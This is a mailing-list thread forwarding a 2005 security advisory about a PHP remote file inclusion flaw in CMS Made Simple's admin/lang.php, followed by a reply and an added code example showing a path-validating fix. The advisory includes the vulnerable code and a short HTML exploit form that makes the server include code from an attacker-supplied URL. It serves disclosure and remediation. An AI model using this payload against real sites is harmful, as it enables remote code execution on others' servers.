I belong to phpsec, a security mailing list and this mail turned up this morning. Not sure if you've seen it yet Wishy?
------ Forwarded Message
From: <groszynskif@gmail.com>
Date: 31 Aug 2005 19:18:04 -0000
To: <bugtraq@securityfocus.com>
Subject: CMS Made Simple <= 0.10 - PHP injection
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: CMS Made Simple - PHP injection
Version <= 0.10
Homepage: http://www.cmsmadesimple.org/
Author: Filip Groszynski (VXSfx)
Date: 31 August 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Background:
CMS Made Simple is an easy to use content management system for simple, stable content sites. It uses PHP, MySQL and the Smarty templating system.
--------------------------------------------------------
Vulnerable code exists in ./admin/lang.php:
<?php
...
$current_language = "en_US";
#Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {
...
#Check to see if there is already a language in use...
if (isset($_POST["change_cms_lang"])) {
[!] $current_language = $_POST["change_cms_lang"];
setcookie("cms_language", $_POST["change_cms_lang"]);
} else if (isset($_COOKIE["cms_language"])) {
$current_language = $_COOKIE["cms_language"];
}
else {
...
}
#Ok, we have a language to load, let's load it already...
if (isset($nls['file'][$current_language])) {
foreach ($nls['file'][$current_language] as $onefile) {
[!] include($onefile);
}
}
...
}
...
?>
--------------------------------------------------------
Exploit:
example.html:
<form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF
--------------------------------------------------------
Contact:
Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <|> gmail <|> com
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
------ End of Forwarded Message
--
[phpsec] Mailing List
Brought to you by php|architect -
http://www.phparch.com
For account maintenance, please visit
http://www.phparch.com/phpsec

Reading the example exploit, I'm pretty sure that it can only occur with register_globals set to on. However, it still needs fixing.
Ensure that $onefile is a local file within the expected cmsms directory before including it. (Probably have to store the "expected cms directory" as a define/const maybe?)
Rob...
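One way to implement the check Rob suggests, as an added example that is not CMS Made Simple's own code: the language code is validated against a strict pattern and an existing directory, the file list is built from a trusted directory rather than from a request variable, and every path is canonicalised and confirmed to sit under that directory before it is included. `CMS_LANG_DIR`, the per-language directory layout and the two function names are assumptions for the illustration.

```php
<?php
// Added example, not from admin/lang.php. CMS_LANG_DIR is an assumed constant
// naming the directory that legitimately holds the language files.
define('CMS_LANG_DIR', __DIR__ . '/../lib/lang');   // assumed location

/**
 * Pick the language to use from POST, then cookie, then the default.
 * Only plain codes such as en_US that match an existing directory under
 * CMS_LANG_DIR are accepted, so ../, URLs and NUL bytes never get through.
 */
function cms_select_language(array $post, array $cookie, string $default = 'en_US'): string
{
    $candidates = [$post['change_cms_lang'] ?? null, $cookie['cms_language'] ?? null];
    foreach ($candidates as $cand) {
        if (is_string($cand)
            && preg_match('/^[a-z]{2}_[A-Z]{2}\z/', $cand)
            && is_dir(CMS_LANG_DIR . '/' . $cand)) {
            return $cand;
        }
    }
    return $default;
}

/**
 * Include $onefile only if its canonical path lies inside CMS_LANG_DIR.
 * realpath() collapses ../ and symlinks and returns false for paths that do
 * not exist locally (including http:// URLs), so a value smuggled into
 * $nls['file'] via register_globals is rejected before include() runs.
 */
function cms_safe_include(string $onefile): bool
{
    $base = realpath(CMS_LANG_DIR);
    $real = realpath($onefile);
    if ($base === false || $real === false) {
        return false;                                   // missing or remote
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;                                   // outside CMS_LANG_DIR
    }
    include $real;                                      // assumed: file only defines $lang[...]
    return true;
}

// The file list comes from the trusted directory, never from the request.
$current_language = cms_select_language($_POST, $_COOKIE);
foreach (glob(CMS_LANG_DIR . '/' . $current_language . '/*.php') ?: [] as $onefile) {
    cms_safe_include($onefile);
}
```

Because `include` runs inside `cms_safe_include()`, anything a language file sets lands in that function's scope; return the loaded array from the function (or include at top level after the check) if the existing code expects it as a global.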